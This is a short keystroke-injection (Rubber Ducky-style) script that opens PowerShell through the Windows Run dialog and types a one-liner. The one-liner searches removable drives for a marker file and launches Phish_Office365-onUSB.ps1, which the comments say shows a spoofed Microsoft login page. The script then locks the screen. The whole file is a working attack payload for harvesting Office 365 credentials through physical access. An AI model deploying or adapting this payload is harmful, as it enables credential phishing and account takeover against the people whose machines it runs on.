REM                                                                    _..._       .-'''-.                 .-'''-.
REM                                                                 .-'_..._''.   '   _    \  .---.       '   _    \
REM /|                                                            .' .'      '.\/   /` '.   \ |   |.--. /   /` '.   \
REM ||    .-.          .-                                        / .'          .   |     \  ' |   ||__|.   |     \  '
REM ||     \ \        / /                               .-,.--. . '            |   '      |  '|   |.--.|   '      |  '
REM ||  __  \ \      / /                          __    |  .-. || |            \    \     / / |   ||  |\    \     / /
REM ||/'__ '.\ \    / /            .--------.  .:--.'.  | |  | || |             `.   ` ..' /  |   ||  | `.   ` ..' /
REM |:/`  '. '\ \  / /             |____    | / |   \ | | |  | |. '                '-...-'`   |   ||  |    '-...-'`
REM ||     | | \ `  /                  /   /  `" __ | | | |  '-  \ '.          .              |   ||  |
REM ||\    / '  \  /                 .'   /    .'.''| | | |       '. `._____.-'/              |   ||__|
REM |/\'..' /   / /                 /    /___ / /   | |_| |         `-.______ /               '---'
REM '  `'-'`|`-' /                 |         |\ \._,\ '/|_|                  `
REM          '..'                  |_________| `--'  `"

REM This script needs the PowerShell script Phish_Office365-onUSB.ps1 to be on a USB drive.
REM The HTML for this script was borrowed from https://github.com/JoniRinta-Kahila/microsoft-login-spoof, kudos for creating this great look-a-like! 
DELAY 1000
GUI r
DELAY 1000
STRING powershell
ENTER
DELAY 2000
ALTCODE $A="powershell.exe";$B="Phish_Office365-onUSB.ps1";$C="4e657a1d-b1a5-4a75-8e45-9a82791a2f21.txt";$D=$false;while(-not $D){$E=Get-WmiObject -Class Win32_Volume|Where-Object{$_.DriveType -eq 2};foreach($F in $E){$G=Join-Path -Path $F.Name -ChildPath $C;if(Test-Path $G){$D=$true;$H=Join-Path -Path $F.Name -ChildPath $B;Start-Process -FilePath $A -ArgumentList "-File $H -Wait"};break}};Exit
ENTER
DELAY 1500
GUI l
